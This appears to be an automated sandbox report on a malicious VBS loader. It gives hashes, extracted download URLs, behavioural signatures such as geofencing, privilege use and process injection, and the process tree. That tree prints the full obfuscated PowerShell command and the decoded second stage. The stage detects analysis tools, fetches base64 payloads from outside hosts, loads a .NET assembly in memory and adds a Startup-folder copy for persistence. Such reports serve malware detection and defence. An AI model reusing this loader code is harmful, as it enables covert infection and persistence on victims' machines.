Analysis

  max time kernel:   93s
  max time network:  147s
  platform:          windows10-2004_x64
  resource:          win10v2004-20241007-en
  resource tags:     arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  submitted:         20-12-2024 11:44
Static task
  static1

Behavioral task
  behavioral1
  Sample:    Sign100000120001.vbs
  Resource:  win7-20240903-en

Behavioral task
  behavioral2
  Sample:    Sign100000120001.vbs
  Resource:  win10v2004-20241007-en
General

  Target:  Sign100000120001.vbs
  Size:    91KB
  MD5:     a7852939ea4eff9943163f2df44d425b
  SHA1:    500c33c8aea15e777dfe79d684e91d60e053eca2
  SHA256:  77b2713d68eaf0dd8c74bcaa12d8c15a3bcb26eb5784f28169b14351c0a2fc45
  SHA512:  6dac1d7dea7e5a6040df6e8d386e7ea1712060171a34200de9707447b5a79751f6ca8730e274d0db8c335d16c48b03b379088bd4f7ff3dcb3a7722b2d266e2bd
  SSDEEP:  1536:vBBBBBBBBB/Fzpy8G/nBBBBBBBBBBBBBBBBB:vBBBBBBBBBOBBBBBBBBBBBBBBBBB
Malware Config
Extracted
https://desckvbrat.com.br/Upcrypter/01/DLL01.txt
https://drive.google.com/uc?export=download&id=
https://desckvbrat.com.br/Upcrypter/01/DLL01.txt
Signatures

Blocklisted process makes network request (1 IoC)
  flow  pid   Process
  8     2332  powershell.exe

Checks computer location settings (2 TTPs, 1 IoC)
Looks up country code configured in the registry, likely geofence.
  description        ioc                                                                                                    Process
  Key value queried  \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation  WScript.exe

  pid   Process
  652   powershell.exe
  1064  powershell.exe
  2332  powershell.exe

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).

Suspicious behavior: EnumeratesProcesses (7 IoCs)
  pid   Process
  1064  powershell.exe
  1064  powershell.exe
  2332  powershell.exe
  2332  powershell.exe
  2332  powershell.exe
  652   powershell.exe
  652   powershell.exe

Suspicious use of AdjustPrivilegeToken (3 IoCs)
  description              pid   Process
  Token: SeDebugPrivilege  1064  powershell.exe
  Token: SeDebugPrivilege  2332  powershell.exe
  Token: SeDebugPrivilege  652   powershell.exe

Suspicious use of WriteProcessMemory (6 IoCs)
  description                       pid   Process         procid_target
  PID 1460 wrote to memory of 1064  1460  WScript.exe     83
  PID 1460 wrote to memory of 1064  1460  WScript.exe     83
  PID 1064 wrote to memory of 2332  1064  powershell.exe  85
  PID 1064 wrote to memory of 2332  1064  powershell.exe  85
  PID 2332 wrote to memory of 652   2332  powershell.exe  87
  PID 2332 wrote to memory of 652   2332  powershell.exe  87
Processes

C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Sign100000120001.vbs"
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID: 1460
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $blpvk = 'Ow' + [char]66 + '9ADsAIA' + [char]66 + '6AFcAVw' + [char]66 + 'CAFYAJAAgAGUAbA' + [char]66 + 'pAEYALQAgAHMAcw' + [char]66 + 'hAHAAeQ' + [char]66 + 'CACAAeQ' + [char]66 + 'jAGkAbA' + [char]66 + 'vAFAAbg' + [char]66 + 'vAGkAdA' + [char]66 + '1AGMAZQ' + [char]66 + '4AEUALQAgAGwAbA' + [char]66 + 'lAGgAcw' + [char]66 + 'yAGUAdw' + [char]66 + 'vAHAAOwAgAGUAYw' + [char]66 + 'yAG8AZgAtACAAIA' + [char]66 + '6AFcAVw' + [char]66 + 'CAFYAJAAgAGgAdA' + [char]66 + 'hAFAAZQ' + [char]66 + 'sAGkARgAtACAAZQ' + [char]66 + 'sAGkARgAtAHQAdQ' + [char]66 + 'PACAAfAAgAE4ASg' + [char]66 + 'lAFQAdwAkADsAIAApACAAJwAxAHMAcAAuADMAMA' + [char]66 + 'sAGwAZAAnACAAKwAgACkAKA' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAHAAbQ' + [char]66 + 'lAFQAdA' + [char]66 + 'lAEcAOgA6AF0AaA' + [char]66 + '0AGEAUAAuAE8ASQAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAIAAoACAAPQAgAHoAVw' + [char]66 + 'XAEIAVgAkADsAJwA7ACkAIAApACAAIAAnACcAbQ' + [char]66 + 'zAEEAZw' + [char]66 + 'lAFIARA' + [char]66 + 'EACAARAAnACcAIAAgACwAIA' + [char]66 + 'NAG8Adw' + [char]66 + 'OAHMAJAAgACwAIAAnACcAaA' + [char]66 + '0AHQAcA' + [char]66 + 'zADoALwAvAHUAcA' + [char]66 + 'hAGQAYQ' + [char]66 + 'yAGkAYQAuAG8Acg' + [char]66 + 'nAC8AeA' + [char]66 + '4AHAALg' + [char]66 + '0AHgAdAAnACcAIAAoACAAXQ' + [char]66 + 'dAFsAdA' + [char]66 + 'jAGUAag' + [char]66 + 'iAG8AWwAgACwAIA' + [char]66 + 'sAGwAdQ' + [char]66 + 'uACQAIAAoAGUAaw' + [char]66 + 'vAHYAbg' + [char]66 + 'JAC4AKQAgACcAJw' + [char]66 + 'JAFYARg' + [char]66 + 'yAHAAJwAnACAAKA' + [char]66 + 'kAG8AaA' + [char]66 + '0AGUAJwAgAD0AKwAgAE4ASg' + [char]66 + 'lAFQAdwAkADsAIAAnAE0AdA' + [char]66 + 'lAEcALgApACAAJwAnADEAcw' + [char]66 + 'zAGEAbA' + [char]66 + 'DAC4AMw' + [char]66 + '5AHIAYQ' + [char]66 + 'yAGIAaQ' + [char]66 + 'MAHMAcw' + [char]66 + 'hAGwAQwAnACcAIAAoAGUAcA' + [char]66 + '5AFQAdA' + [char]66 + 'lAEcAJwAgAD0AKwAgAE4ASg' + [char]66 + 
'lAFQAdwAkADsAIAAnAC4AKQAgAHoAZA' + [char]66 + 'mAHkARgAkACAAKA' + [char]66 + 'kAGEAbw' + [char]66 + 'MAC4Abg' + [char]66 + 'pAGEAbQ' + [char]66 + 'vAEQAdA' + [char]66 + 'uAGUAcg' + [char]66 + 'yAHUAQwA6ACcAIAArACAAJwA6AF0Abg' + [char]66 + 'pAGEAbQ' + [char]66 + 'vAEQAcA' + [char]66 + 'wAEEALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bACcAIAA9ACsAIA' + [char]66 + 'OAEoAZQ' + [char]66 + 'UAHcAJAA7ACAAJwA7ACAAKQAgACkAJwAnAEEAJwAnACwAJwAnAJMhOgCTIScAJwAoAGUAYw' + [char]66 + 'hAGwAcA' + [char]66 + 'lAHIALg' + [char]66 + 'HAGUAYQ' + [char]66 + '5AHIAJAAgACgAZw' + [char]66 + 'uAGkAcg' + [char]66 + '0AFMANAA2AGUAcw' + [char]66 + 'hAEIAbQ' + [char]66 + 'vAHIARgA6ADoAXQ' + [char]66 + '0AHIAZQ' + [char]66 + '2AG4Abw' + [char]66 + 'DAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AHMAWwAgAD0AIA' + [char]66 + '6AGQAZg' + [char]66 + '5AEYAJAAgAF0AXQ' + [char]66 + 'bAGUAdA' + [char]66 + '5AEIAWwAnACAAPQArACAATg' + [char]66 + 'KAGUAVA' + [char]66 + '3ACQAOwAgACcAOwApADgARg' + [char]66 + 'UAFUAIA' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALQAgACcAIAArACAAeA' + [char]66 + 'OAFYAWg' + [char]66 + 'lACQAIAArACAAJwAgAGgAdA' + [char]66 + 'hAFAALQAgAHQAbg' + [char]66 + 'lAHQAbg' + [char]66 + 'vAEMALQ' + [char]66 + '0AGUARwAoACAAPQAgAEcAZQ' + [char]66 + 'hAHkAcgAkACAAOwAgACcAJwAlAEkAaA' + [char]66 + 'xAFIAWAAlACcAJwAgAD0AIA' + [char]66 + 'NAG8Adw' + [char]66 + 'OAHMAJAAnACAAIAA9ACAATg' + [char]66 + 'KAGUAVA' + [char]66 + '3ACQAOwAgAGUAYw' + [char]66 + 'yAG8AZgAtACAAeA' + [char]66 + 'OAFYAWg' + [char]66 + 'lACQAIA' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAGUAbA' + [char]66 + 'pAEYALQAgAGUAbA' + [char]66 + 'pAEYALQ' + [char]66 + '0AHUATwAgAHwAIA' + [char]66 + 'wAHkAWQ' + [char]66 + 'TAE4AJAA7ACAAKQAgAEUATQ' + [char]66 + 'LAGYAdQAkACAAKA' + [char]66 + 'nAG4AaQ' + [char]66 + 'yAHQAUw' + [char]66 + 'kAGEAbw' + [char]66 + 'sAG4Adw' + [char]66 + 'vAEQALg' + [char]66 + 'OAGwAcg' + [char]66 + 'oAFAAJAAgAD0AIA' + [char]66 + 'wAHkAWQ' + [char]66 + 
'TAE4AJAA7ACAAKQAgAFYAcA' + [char]66 + 'rAHUASgAkACAAaA' + [char]66 + '0AGEAUAAtACAAdA' + [char]66 + 'uAGUAdA' + [char]66 + 'uAG8AQwAtAHQAZQ' + [char]66 + 'HACAAKAAgAD0AIAAgAEUATQ' + [char]66 + 'LAGYAdQAkADsAIAA4AEYAVA' + [char]66 + 'VADoAOg' + [char]66 + 'dAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAuAHQAeA' + [char]66 + 'lAFQALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bACAAPQAgAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAuAE4AbA' + [char]66 + 'yAGgAUAAkADsAIA' + [char]66 + '0AG4AZQ' + [char]66 + 'pAGwAQw' + [char]66 + 'iAGUAVwAuAHQAZQ' + [char]66 + 'OAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAIA' + [char]66 + '0AGMAZQ' + [char]66 + 'qAGIATwAtAHcAZQ' + [char]66 + 'OACAAPQAgAE4AbA' + [char]66 + 'yAGgAUAAkADsAIAApACcAdA' + [char]66 + '4AHQALgAyADAAbA' + [char]66 + 'sAGQAJwAgACsAIAApACgAaA' + [char]66 + '0AGEAUA' + [char]66 + 'wAG0AZQ' + [char]66 + 'UAHQAZQ' + [char]66 + 'HADoAOg' + [char]66 + 'dAGgAdA' + [char]66 + 'hAFAALg' + [char]66 + 'PAEkALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bACAAKAAgAD0AIA' + [char]66 + '4AE4AVg' + [char]66 + 'aAGUAJAA7ACAAZQ' + [char]66 + 'jAHIAbw' + [char]66 + 'mAC0AIAAnADgARg' + [char]66 + 'UAFUAJwAgAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAtACAAVg' + [char]66 + 'wAGsAdQ' + [char]66 + 'KACQAIA' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAGUAbA' + [char]66 + 'pAEYALQAgAGUAbA' + [char]66 + 'pAEYALQ' + [char]66 + '0AHUATwAgAHwAIA' + [char]66 + 'jAGUAbQ' + [char]66 + 'SAGMAJAA7AHkATQ' + [char]66 + 'lAHMAYQ' + [char]66 + 'CACAAPQAgAGMAZQ' + [char]66 + 'tAFIAYwAkACAAOw' + [char]66 + 'jAGUAbQ' + [char]66 + 'SAGMAJAAgAD0AIA' + [char]66 + 'lAHMAYQ' + [char]66 + 'iAGcAbg' + [char]66 + 'pAHIAdA' + [char]66 + 'TACQAOwAgACkAIA' + [char]66 + 'oAG0AeQ' + [char]66 + 'uAGoAJAAgACgAZw' + [char]66 + 'uAGkAcg' + [char]66 + '0AFMAZA' + [char]66 + 'hAG8AbA' + [char]66 + 'uAHcAbw' + [char]66 + 'EAC4AdA' + [char]66 + 'uAGUAaQ' + [char]66 + 'sAEMAYg' + [char]66 + 'lAHcAJAAgAD0AIA' + 
[char]66 + 'jAGUAbQ' + [char]66 + 'SAGMAJAA7ACAAdA' + [char]66 + 'uAGUAaQ' + [char]66 + 'sAEMAYg' + [char]66 + 'lAFcALg' + [char]66 + '0AGUATgAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TACAAdA' + [char]66 + 'jAGUAag' + [char]66 + 'iAE8ALQ' + [char]66 + '3AGUATgAgAD0AIA' + [char]66 + '0AG4AZQ' + [char]66 + 'pAGwAQw' + [char]66 + 'iAGUAdwAkADsAKQAnAHQAeA' + [char]66 + '0AC4AMQAwAGwAbA' + [char]66 + 'kACcAIAArACAAKQAoAGgAdA' + [char]66 + 'hAFAAcA' + [char]66 + 'tAGUAVA' + [char]66 + '0AGUARwA6ADoAXQ' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAC4ATw' + [char]66 + 'JAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgACgAIAA9ACAAVg' + [char]66 + 'wAGsAdQ' + [char]66 + 'KACQAOwApACAAJw' + [char]66 + '0AHgAdAAuADEAMA' + [char]66 + 'MAEwARAAvADEAMAAvACcAIAArACAAJw' + [char]66 + 'yAGUAdA' + [char]66 + 'wAHkAcg' + [char]66 + 'jAHAAVQAvAHIAYgAuAG0Abw' + [char]66 + 'jAC4AdA' + [char]66 + 'hAHIAYg' + [char]66 + '2AGsAYw' + [char]66 + 'zAGUAZAAvAC8AOg' + [char]66 + 'zAHAAdA' + [char]66 + '0AGgAJwAoACAAPQAgAGgAbQ' + [char]66 + '5AG4AagAkADsAfQA7AHoAZA' + [char]66 + 'mAHkARgAkACAAbg' + [char]66 + 'yAHUAdA' + [char]66 + 'lAHIAOwApACkAZQ' + [char]66 + 'zAGEAYg' + [char]66 + 'nAG4AaQ' + [char]66 + 'yAHQAUwAkACgAZw' + [char]66 + 'uAGkAcg' + [char]66 + '0AFMANAA2AGUAcw' + [char]66 + 'hAEIAbQ' + [char]66 + 'vAHIARgA6ADoAXQ' + [char]66 + '0AHIAZQ' + [char]66 + '2AG4Abw' + [char]66 + 'DAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AHMAWwAoAGcAbg' + [char]66 + 'pAHIAdA' + [char]66 + 'TAHQAZQ' + [char]66 + 'HAC4AOA' + [char]66 + 'GAFQAVQA6ADoAXQ' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALg' + [char]66 + '0AHgAZQ' + [char]66 + 'UAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + '6AGQAZg' + [char]66 + '5AEYAJAA7AHsAeQ' + [char]66 + 'NAGUAcw' + [char]66 + 'hAEIAIA' + [char]66 + 'uAG8AaQ' + [char]66 + '0AGMAbg' + [char]66 + '1AEYAOw' + [char]66 + 'lAHMAYQ' + [char]66 + 'iAGcAbg' + [char]66 + 'pAHIAdA' + [char]66 + 'TACQAOw' + [char]66 + 
'9ACAACgANADsAdA' + [char]66 + 'pAHgAZQAgACAAIAAgACAAIAAKAA0AOwAgAGUAYw' + [char]66 + 'yAG8AZgAtACAAcg' + [char]66 + 'lAHQAdQ' + [char]66 + 'wAG0Abw' + [char]66 + 'DAC0AdA' + [char]66 + 'yAGEAdA' + [char]66 + 'zAGUAUgAKAA0AIA' + [char]66 + '7AGUAcw' + [char]66 + 'sAGUACgANAAoADQ' + [char]66 + '9AAoADQAgACAAIAAgACAAIAAgAAoADQAgAHsAKQ' + [char]66 + 'sAGwAdQ' + [char]66 + 'OACQAIA' + [char]66 + 'xAGUALQAgACkAZQ' + [char]66 + '1AG4AaQ' + [char]66 + '0AG4Abw' + [char]66 + 'DAHkAbA' + [char]66 + '0AG4AZQ' + [char]66 + 'sAGkAUwAgAGEAZQAtACAAJw' + [char]66 + 'lAHoAeQ' + [char]66 + 'sAGEAbg' + [char]66 + 'hACcALAAnAFMATg' + [char]66 + 'EAGUAdA' + [char]66 + 'hAHAAYQAnACwAJw' + [char]66 + 'rAHIAYQ' + [char]66 + 'oAHMAZQ' + [char]66 + 'yAGkAVwAnACAAcw' + [char]66 + 'zAGUAYw' + [char]66 + 'vAHIAcAAtAHQAZQ' + [char]66 + 'nACgAKA' + [char]66 + 'mAGkAOwAgADIAMQ' + [char]66 + 'zAGwAVAA6ADoAXQ' + [char]66 + 'lAHAAeQ' + [char]66 + 'UAGwAbw' + [char]66 + 'jAG8AdA' + [char]66 + 'vAHIAUA' + [char]66 + '5AHQAaQ' + [char]66 + 'yAHUAYw' + [char]66 + 'lAFMALg' + [char]66 + '0AGUATgAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAIAA9ACAAbA' + [char]66 + 'vAGMAbw' + [char]66 + '0AG8Acg' + [char]66 + 'QAHkAdA' + [char]66 + 'pAHIAdQ' + [char]66 + 'jAGUAUwA6ADoAXQ' + [char]66 + 'yAGUAZw' + [char]66 + 'hAG4AYQ' + [char]66 + 'NAHQAbg' + [char]66 + 'pAG8AUA' + [char]66 + 'lAGMAaQ' + [char]66 + '2AHIAZQ' + [char]66 + 'TAC4AdA' + [char]66 + 'lAE4ALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bADsAIA' + [char]66 + '9AGUAdQ' + [char]66 + 'yAHQAJA' + [char]66 + '7ACAAPQAgAGsAYw' + [char]66 + 'hAGIAbA' + [char]66 + 'sAGEAQw' + [char]66 + 'uAG8AaQ' + [char]66 + '0AGEAZA' + [char]66 + 'pAGwAYQ' + [char]66 + 'WAGUAdA' + [char]66 + 'hAGMAaQ' + [char]66 + 'mAGkAdA' + [char]66 + 'yAGUAQw' + [char]66 + 'yAGUAdg' + [char]66 + 'yAGUAUwA6ADoAXQ' + [char]66 + 'yAGUAZw' + [char]66 + 'hAG4AYQ' + [char]66 + 'NAHQAbg' + [char]66 + 'pAG8AUA' + [char]66 + 'lAGMAaQ' + [char]66 + '2AHIAZQ' + [char]66 
+ 'TAC4AdA' + [char]66 + 'lAE4ALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bAHsAIA' + [char]66 + 'lAHMAbA' + [char]66 + 'lAH0AIA' + [char]66 + 'mAC8AIAAwACAAdAAvACAAcgAvACAAZQ' + [char]66 + '4AGUALg' + [char]66 + 'uAHcAbw' + [char]66 + 'kAHQAdQ' + [char]66 + 'oAHMAIAA7ACcAMAA4ADEAIA' + [char]66 + 'wAGUAZQ' + [char]66 + 'sAHMAJwAgAGQAbg' + [char]66 + 'hAG0AbQ' + [char]66 + 'vAGMALQAgAGUAeA' + [char]66 + 'lAC4AbA' + [char]66 + 'sAGUAaA' + [char]66 + 'zAHIAZQ' + [char]66 + '3AG8AcAA7ACAAZQ' + [char]66 + 'jAHIAbw' + [char]66 + 'mAC0AIAApACAAJw' + [char]66 + 'wAHUAdA' + [char]66 + 'yAGEAdA' + [char]66 + 'TAFwAcw' + [char]66 + 'tAGEAcg' + [char]66 + 'nAG8Acg' + [char]66 + 'QAFwAdQ' + [char]66 + 'uAGUATQAgAHQAcg' + [char]66 + 'hAHQAUw' + [char]66 + 'cAHMAdw' + [char]66 + 'vAGQAbg' + [char]66 + 'pAFcAXA' + [char]66 + '0AGYAbw' + [char]66 + 'zAG8Acg' + [char]66 + 'jAGkATQ' + [char]66 + 'cAGcAbg' + [char]66 + 'pAG0AYQ' + [char]66 + 'vAFIAXA' + [char]66 + 'hAHQAYQ' + [char]66 + 'EAHAAcA' + [char]66 + '' + [char]66 + 'AFwAJwAgACsAIA' + [char]66 + 'RAEYAdg' + [char]66 + '6AFQAJAAgACgAIA' + [char]66 + 'uAG8AaQ' + [char]66 + '0AGEAbg' + [char]66 + 'pAHQAcw' + [char]66 + 'lAEQALQAgACcAJQ' + [char]66 + 'JAGgAcQ' + [char]66 + 'SAFgAJQAnACAAbQ' + [char]66 + 'lAHQASQAtAHkAcA' + [char]66 + 'vAEMAIAA7ACAAdA' + [char]66 + 'yAGEAdA' + [char]66 + 'zAGUAcg' + [char]66 + 'vAG4ALwAgAHQAZQ' + [char]66 + 'pAHUAcQAvACAAWA' + [char]66 + 'HAEMAQw' + [char]66 + 'KACAAZQ' + [char]66 + '4AGUALg' + [char]66 + 'hAHMAdQ' + [char]66 + '3ACAAZQ' + [char]66 + '4AGUALg' + [char]66 + 'sAGwAZQ' + [char]66 + 'oAHMAcg' + [char]66 + 'lAHcAbw' + [char]66 + 'wACAAOwApACcAdQ' + [char]66 + 'zAG0ALg' + [char]66 + 'uAGkAdw' + [char]66 + 'wAFUAXAAnACAAKwAgAGoATQ' + [char]66 + 'PAHoASAAkACgAIAA9ACAAWA' + [char]66 + 'HAEMAQw' + [char]66 + 'KADsAKQAgAGUAbQ' + [char]66 + 'hAE4Acg' + [char]66 + 'lAHMAVQA6ADoAXQ' + [char]66 + '0AG4AZQ' + [char]66 + 'tAG4Abw' + [char]66 + 'yAGkAdg' + [char]66 + 
'uAEUAWwAgACsAIAAnAFwAcw' + [char]66 + 'yAGUAcw' + [char]66 + 'VAFwAOg' + [char]66 + 'DACcAKAAgAD0AIA' + [char]66 + 'RAEYAdg' + [char]66 + '6AFQAJAA7ACkAIAApACcAdQ' + [char]66 + 'zAG0ALg' + [char]66 + 'uAGkAdw' + [char]66 + 'wAFUAXAAnACAAKwAgAGoATQ' + [char]66 + 'PAHoASAAkACgAIAAsAHcAeg' + [char]66 + '0AHQAdwAkACgAZQ' + [char]66 + 'sAGkARg' + [char]66 + 'kAGEAbw' + [char]66 + 'sAG4Adw' + [char]66 + 'vAEQALg' + [char]66 + 'wAHMAeg' + [char]66 + 'xAHYAJAA7ADgARg' + [char]66 + 'UAFUAOgA6AF0AZw' + [char]66 + 'uAGkAZA' + [char]66 + 'vAGMAbg' + [char]66 + 'FAC4AdA' + [char]66 + '4AGUAVAAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAIAA9ACAAZw' + [char]66 + 'uAGkAZA' + [char]66 + 'vAGMAbg' + [char]66 + 'FAC4AcA' + [char]66 + 'zAHoAcQ' + [char]66 + '2ACQAOwApAHQAbg' + [char]66 + 'lAGkAbA' + [char]66 + 'DAGIAZQ' + [char]66 + 'XAC4AdA' + [char]66 + 'lAE4AIA' + [char]66 + '0AGMAZQ' + [char]66 + 'qAGIATwAtAHcAZQ' + [char]66 + 'OACgAIAA9ACAAcA' + [char]66 + 'zAHoAcQ' + [char]66 + '2ACQAOw' + [char]66 + '9ADsAIAApACcAdwA1ADAAWgAxADgAdQ' + [char]66 + 'jADcAWg' + [char]66 + 'NAEsAOAA4AGcAZQ' + [char]66 + '0AGgAag' + [char]66 + 'uAEEAcA' + [char]66 + 'qADEATA' + [char]66 + 'CAC0ANA' + [char]66 + '5AEgAYQ' + [char]66 + 'hADEAJwAgACsAIA' + [char]66 + '3AHoAdA' + [char]66 + '0AHcAJAAoACAAPQAgAHcAeg' + [char]66 + '0AHQAdwAkAHsAIA' + [char]66 + 'lAHMAbA' + [char]66 + 'lAH0AOwAgACkAJw' + [char]66 + 'WAEUAUw' + [char]66 + 'kAGoAdw' + [char]66 + 'VADkANQ' + [char]66 + 'SAC0AVw' + [char]66 + 'zAFkAdQ' + [char]66 + 'aAEwAaQ' + [char]66 + '3AHIAYgA1AFkATg' + [char]66 + 'RAC0ASA' + [char]66 + 'qAHIAYgAyAHAAMQAnACAAKwAgAHcAeg' + [char]66 + '0AHQAdwAkACgAIAA9ACAAdw' + [char]66 + '6AHQAdA' + [char]66 + '3ACQAewAgACkAIA' + [char]66 + 'RAGQAZQ' + [char]66 + 'jAFQAJAAgACgAIA' + [char]66 + 'mAGkAOwAgACkAJwA0ADYAJwAoAHMAbg' + [char]66 + 'pAGEAdA' + [char]66 + 'uAG8AQwAuAEUAUg' + [char]66 + 'VAFQAQw' + [char]66 + 'FAFQASQ' + [char]66 + 'IAEMAUg' + [char]66 + '' + [char]66 + 'AF8AUg' + [char]66 + 
'PAFMAUw' + [char]66 + 'FAEMATw' + [char]66 + 'SAFAAOg' + [char]66 + '2AG4AZQAkACAAPQAgAFEAZA' + [char]66 + 'lAGMAVAAkADsAJwA9AGQAaQAmAGQAYQ' + [char]66 + 'vAGwAbg' + [char]66 + '3AG8AZAA9AHQAcg' + [char]66 + 'vAHAAeA' + [char]66 + 'lAD8AYw' + [char]66 + '1AC8AbQ' + [char]66 + 'vAGMALg' + [char]66 + 'lAGwAZw' + [char]66 + 'vAG8AZwAuAGUAdg' + [char]66 + 'pAHIAZAAvAC8AOg' + [char]66 + 'zAHAAdA' + [char]66 + '0AGgAJwAgAD0AIA' + [char]66 + '3AHoAdA' + [char]66 + '0AHcAJAA7ACkAIAAnAHUAcw' + [char]66 + 'tAC4Abg' + [char]66 + 'pAHcAcA' + [char]66 + 'VAFwAJwAgACsAIA' + [char]66 + 'qAE0ATw' + [char]66 + '6AEgAJAAgACgAIA' + [char]66 + 'sAGUAZAA7ACkAKA' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAHAAbQ' + [char]66 + 'lAFQAdA' + [char]66 + 'lAEcAOgA6AF0AaA' + [char]66 + '0AGEAUAAuAE8ASQAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAIAA9ACAAag' + [char]66 + 'NAE8Aeg' + [char]66 + 'IACQAewAgACkAIA' + [char]66 + 'DAGUATw' + [char]66 + 'JAGMAJAAgACgAIA' + [char]66 + 'mAGkAOwAgACkAMgAoAHMAbA' + [char]66 + 'hAHUAcQ' + [char]66 + 'FAC4Acg' + [char]66 + 'vAGoAYQ' + [char]66 + 'NAC4Abg' + [char]66 + 'vAGkAcw' + [char]66 + 'yAGUAVgAuAHQAcw' + [char]66 + 'vAGgAJAAgAD0AIA' + [char]66 + 'DAGUATw' + [char]66 + 'JAGMAJAAgADsA';$blpvk = $blpvk.replace('уЦϚ' , 'B') ;;$slvnr = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $blpvk ) ); $slvnr = $slvnr[-1..-$slvnr.Length] -join '';$slvnr = $slvnr.replace('%XRqhI%','C:\Users\Admin\AppData\Local\Temp\Sign100000120001.vbs');powershell $slvnr2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID: 1064
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $cIOeC = $host.Version.Major.Equals(2) ;if ( $cIOeC ) {$HzOMj = [System.IO.Path]::GetTempPath();del ( $HzOMj + '\Upwin.msu' );$wttzw = 'https://drive.google.com/uc?export=download&id=';$TcedQ = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $TcedQ ) {$wttzw = ($wttzw + '1p2brjH-QNY5brwiLZuYsW-R59UwjdSEV') ;}else {$wttzw = ($wttzw + '1aaHy4-BL1jpAnjhteg88KMZ7cu81Z05w') ;};$vqzsp = (New-Object Net.WebClient);$vqzsp.Encoding = [System.Text.Encoding]::UTF8;$vqzsp.DownloadFile($wttzw, ($HzOMj + '\Upwin.msu') );$TzvFQ = ('C:\Users\' + [Environment]::UserName );JCCGX = ($HzOMj + '\Upwin.msu'); powershell.exe wusa.exe JCCGX /quiet /norestart ; Copy-Item 'C:\Users\Admin\AppData\Local\Temp\Sign100000120001.vbs' -Destination ( $TzvFQ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ;[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;if((get-process 'Wireshark','apateDNS','analyze' -ea SilentlyContinue) -eq $Null){ } else{ Restart-Computer -force ; exit; };$Stringbase;Function BaseMy{;$Fyfdz = [System.Text.Encoding]::UTF8.GetString([system.Convert]::FromBase64String($Stringbase));return $Fyfdz;};$jnymh = ('https://desckvbrat.com.br/Upcrypter' + '/01/DLL01.txt' );$JukpV = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$webClient = New-Object System.Net.WebClient ;$cRmec = $webClient.DownloadString( $jnymh ) ;$Stringbase = $cRmec; $cRmec = BaseMy;$cRmec | Out-File -FilePath $JukpV -Encoding 'UTF8' -force ;$eZVNx = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$ufKME = ( Get-Content -Path $JukpV ) ;$NSYyp = $PhrlN.DownloadString( $ufKME ) ;$NSYyp | 
Out-File -FilePath $eZVNx -force ;$wTeJN = '$sNwoM = ''C:\Users\Admin\AppData\Local\Temp\Sign100000120001.vbs'' ; $ryaeG = (Get-Content -Path ' + $eZVNx + ' -Encoding UTF8);' ;$wTeJN += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''↓:↓'',''A'') ) ;' ;$wTeJN += '[System.AppDomain]:' + ':CurrentDomain.Load( $Fyfdz ).' ;$wTeJN += 'GetType( ''ClassLibrary3.Class1'' ).GetM' ;$wTeJN += 'ethod( ''prFVI'' ).Invoke( $null , [object[]] ( ''txt.pxx/gro.airadapu//:sptth'' , $sNwoM , ''D DDRegAsm'' ) );';$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1' ) ;$wTeJN | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;};"3⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID: 2332
